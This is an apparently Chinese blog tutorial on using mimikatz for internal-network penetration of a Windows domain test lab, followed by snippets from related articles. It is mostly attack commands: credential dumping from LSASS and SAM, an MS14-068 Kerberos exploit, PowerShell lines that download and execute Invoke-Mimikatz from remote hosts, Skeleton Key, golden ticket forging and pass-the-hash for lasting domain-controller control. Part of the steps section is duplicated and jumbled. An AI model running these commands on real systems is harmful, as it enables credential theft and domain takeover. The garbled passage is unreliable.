内网渗透中mimikatz的使用

最新推荐文章于 2024-08-07 09:45:00 发布
最新推荐文章于 2024-08-07 09:45:00 发布
阅读量4.7w 收藏 69
点赞数 8
分类专栏: 渗透测试
0x01 简介

mimikatz,很多人称之为密码抓取神器,但在内网渗透中,远不止这么简单

0x02 测试环境

网络资源管理模式:


已有资源:

域内一台主机权限
操作系统:win7 x64
域权限:普通用户

0x03 测试目标

1、获得域控权限 2、导出所有用户口令 3、维持域控权限

0x04 测试过程

1、获取本机信息

mimikatz:

privilege::debug
sekurlsa::logonpasswords

获取本机用户名、口令、sid、LM hash、NTLM hash 如图
这里写图片描述

2、攻击域控,获得权限

使用ms14-068漏洞

ms14-068.exe -u -p -s -d
生成伪造缓存test.ccache:
这里写图片描述
导入伪造缓存: mimikatz:

kerberos::ptc test.ccache
登陆:

net use \\A-635ECAEE64804.TEST.LOCAL
dir \\A-635ECAEE64804.TEST.LOCAL\c$

这里写图片描述
3、导出域(1)直接获取内存口令 mimikatz:

privilege::debug
sekurlsa::logonpasswords2)通过内存文件获取口令 使用procdump导出lsass.dmp mimikatz:

sekurlsa::minidump lsass.dmp
sekurlsa::logonPasswords full3)通过powershell加载mimikatz获取口令

powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz4)导出所有用户口令 使用Volue Shadow Copy获得SYSTEM、SAM备份(之前文章有介绍) mimikatz:

lsadump::sam SYSTEM.hiv SAM.hiv持域控权限

(1)Skeleton Key mimikatz:
privilege::debug
misc::skeleton
万能钥匙,可使用任意用户登陆域控

net use \\A-635ECAEE64804.TEST.LOCAL mimikatz /user:test
4、维持域控权限

(1)Skeleton Key mimikatz:

privilege::debug
misc::skeleton
万能钥匙,可使用任意用户登陆域控

net use \\A-635ECAEE64804.TEST.LOCAL mimikatz /user:test

这里写图片描述
(2)golden ticket mimikatz:

lsadump::lsa /patch
获取krbtgt的ntlmhash,如图
这里写图片描述

生成万能票据: mimikatz:

kerberos::golden /user:Administrator /domain:test.local /sid:S-1-5-21-2848411111-3820811111-1717111111 /krbtgt:d3b949b1f4ef947820f0950111111111 /ticket:test.kirbi
导入票据: mimikatz:

kerberos::ptt test.kirbi
登陆域控:

net use \\A-635ECAEE64804.TEST.LOCAL
dir \\A-635ECAEE64804.TEST.LOCAL\c$

这里写图片描述

Tips:

Golden Ticket不多说,自行理解
By default, the Golden Ticket default lifetime is 10 years
password changing/smartcard usage does not invalidate Golden Ticket;
this ticket is not emitted by the real KDC, it’s not related to ciphering methods allowed;
NTLM hash of krbtgt account is never changed automatically.
(3)Pass-The-Hash mimikatz:

sekurlsa::pth /user:Administrator /domain:test.local /ntlm:cc36cf7a8514893efccd332446158b1a

这里写图片描述

5、补充

登陆域控,刷新扫雷记录,留下名字;D mimikatz:

minesweeper::infos
如图
这里写图片描述

pyphrb
关注
专栏目录
Invoke-Mimikatz.ps1脚本使用
墨痕诉清风的博客
05-31 531
Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::logonPasswords full"' //获取密码。有时当获得权限时无法使用mimikatz.exe时,可以考虑使用Invoke-Mimikatz.ps1脚本获取想要的数据。Import-Module .\Invoke-Mimikatz.ps1 //导入命令。Set-ExecutionPolicy Unrestricted //打开限制。
内网渗透系列之mimikatz使用以及后门植入
lza20001103的博客
09-04 4406
内网渗透系列之mimikatz使用以及后门植入 文章目录内网渗透系列之mimikatz使用以及后门植入前言mimikatz使用后门植入msf永久后门植入(1)Meterpreter后门:Metsvc(2)Meterpreter后门:PersistenceNC后门后记 前言 内网渗透最重要的环节就是权限维持,当我们获取到靶机的权限后,当对方的机器关机后,我们所获取的会话也会跟着消失,也就是说当他重新开启后,我们又得重新进行信息收集,漏洞利用,又重复着上一个渗透的过程,工程量就很大了。所以,为了能一直维持
mimikatz的基本使用
a3320315的博客
05-25 9890
常见命令 cls-----------------------------清屏 exit----------------------------退出 version------------查看mimikatz的版本 system::user-----查看当前登录的系统用户 system::computer-------查看计算机名称 process::list------------------列出进程 process::suspend 进程名称 -----暂停进程 process::stop 进程名称--
Invoke-Mimikatz.txt
03-01
Invoke-Mimikatz
萌新如何玩转mimikatz
最新发布
Python单行客的博客
08-07 1077
萌新如何玩转mimikatz
Invoke-Portscan、Invoke-Mimikatz、Get-Keystrokes
weixin_46104215的博客
11-08 495
一、Invoke-Portscan Recon 模块的一个脚本,主要用于端口扫描 1.下载脚本 IEX(New-Object Net.WebClient).DownloadString("http://192.168.110.130/PowerSploit/Recon/Invoke-Portscan.ps1") 2.扫描 Invoke-Portscan -Hosts 192.168.110.130, 192.168.110.142 -Ports "80,22,4444" 二、Invo
mimikatz工具使用
weixin_45605313的博客
07-10 1323
mimikatz使用命令:msf下的mimikatz mimikatz:后渗透工具,从window进程获取内存,并获取明文密码和NTLM哈希值的工具。 kali路径:/usr/share/windows-resources/mimikatz 使用 将工具移植到靶机: win32目录下 命令命令 含义 :: 查询帮助信息 standard:基础命令 命令 含义 exit 退出 cls 清屏 version 版本 cd 切换目录 localt
powershell + Invoke-Mimikatz.ps1获取系统密码
大方子
10-29 6107
参照:https://blog.51cto.com/simeon/2126106 进行实现 Invoke-Mimikatz.ps1下载地址 https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1 (1)目标主机具备网络环境 power...
内网渗透专用-mimikatz
05-06
标题的"内网渗透专用-mimikatz"明确指出,这个压缩包的内容是与mimikatz相关的,可能包含了该工具的不同版本或特定的使用教程,旨在帮助用户在内网渗透测试更有效地利用它。 描述的"懂得都懂!"是一个含蓄的...
内网渗透mimikatz 基本使用
君行路的博客
08-14 2163
文章目录前言1. 工具简介2. 提升权限 privilege::debug3. 抓取明文密码 sekurlsa::logonpasswords4. sekurlsa模块 获取密码信息4.1 procdump + mimikatz 加载dmp文件,并导出其的明文密码4.2 导出lsass.exe进程所有的票据 sekurlsa::tickets /export5. lsadump模块 读取域控域成员Hash5.1 读取所有域用户的哈希 lsadump::lsa /patch5.2 查看域内指定用户信息,
misc经验积累篇—内网渗透神器(Mimikatz
m0_67503765的博客
03-14 418
bugku简单的取证
windows内存密码获取mimikatz_trunk
04-17
第一条:privilege::debug //提升权限 第二条:sekurlsa::logonpasswords https://github.com/gentilkiwi/mimikatz/releases/tag/2.1.1-20180325
掌握内网渗透之道,成为实战高手,看《内网渗透实战攻略》就够了
等风来
01-10 2665
当今,网络系统面临着越来越严峻的安全挑战。在众多的安全挑战,一种有组织、有特定目标、长时间持续的新型网络攻击日益猖獗,国际上常称之为APT(Advanced Persistent Threat,高级持续性威胁)攻击。传统的渗透测试从外网发起攻击,并以攻破单台主机为目标。与之相比,APT攻击在技术上更加系统地实现了对目标内网主机的大批量控制,从而使业内对内网渗透技术的关注度提高到了一个空前的高度。
通过xencrypt免杀invoke-mimikatz.ps1
网络安全。
03-03 1603
0x01 简介 xencrypt目前测试只在windows 2012 powershell下可正常使用,需要依赖原本的invoke-mimikatz.ps1,生成以后可多次使用。 0x02 使用 1、下载invoke-mimikatz.ps1到同级目录下。 https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exf...
【后渗透】Mimikatz使用大全
hacker3062的博客
10-14 1901
Mimikatz 是一款功能强大的轻量级调试神器,通过它你可以提升进程权限注入进程读取进程内存,当然他最大的亮点就是他可以直接从 lsass.exe 进程获取当前登录系统用户名的密码, lsass是微软Windows系统的安全机制它主要用于本地安全和登陆策略,通常我们在登陆系统时输入密码之后,密码便会储存在 lsass内存,经过其 wdigest 和 tspkg 两个模块调用后,对其使用可逆的算法进行加密并存储在内存之, 而 mimikatz 正是通过对lsass逆算获取到明文密码!
【源码阅读】Mimikatz相关资料
weixin_30843605的博客
01-25 321
Mimikatz GitHub (源码) https://github.com/gentilkiwi/mimikatz Mimikatz GitHub Wiki (包含了一些说明文档) https://github.com/gentilkiwi/mimikatz/wiki GentilKiwi Blog (博客里的大多数内容是用法语写的,请使用 Chrome 浏览器进行自动翻译) ht...
哈希处理介绍-使用Mimikatz以及John对Windows用户密码破解
ran的博客
02-06 6968
Windows系统使用两种算法对用户的密码进行哈希处理, 它们分别是LM-hash算法和NTLMhash算法。所谓哈希(hash) , 就是使用一种加密函数对其进行加密。这个加密函数对一个任意长度的字符串数据进行一次数学加密函数运算,然后返回一个固定长度的字符串。Windows的系统密码hash默认情况下一般由两部分组成:第一部分是LM-hash, 第二部分是NTLM-hash。通常可从Windows系统的SAM文件和域控制器的NTDS.dit文件获得所有用户的hash。
Mimikatz介绍
#7的博客
03-26 1840
本文主要介绍了mimikatz的定义、功能模块,并对常见的功能模块进行了详细的阐述。
Mimikatz使用小技巧
KEY0NE的个人博客
10-27 136
大家都知道Mimikatz绝对是一款神器,这里就简单介绍下Mimikatz使用小技巧~1.记录 Mimikatz输出:C:\>mimikatz.exe ""privilege::debug"" ""log sekurlsa::logonpasswords full"" exit && dir2.将输出导入到本地文件:C:\>mimik...
kali mimikatz使用教程
06-28
这是一个对于使用 Mimikatz 工具的教程。 Mimikatz 是一个开发者用来获取 Windows 认证凭证的工具,它可以解密 Windows 存储的密码,甚至可以获取经过 NTLM 身份验证的密码。 但请注意,使用这个工具可能会涉及到...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值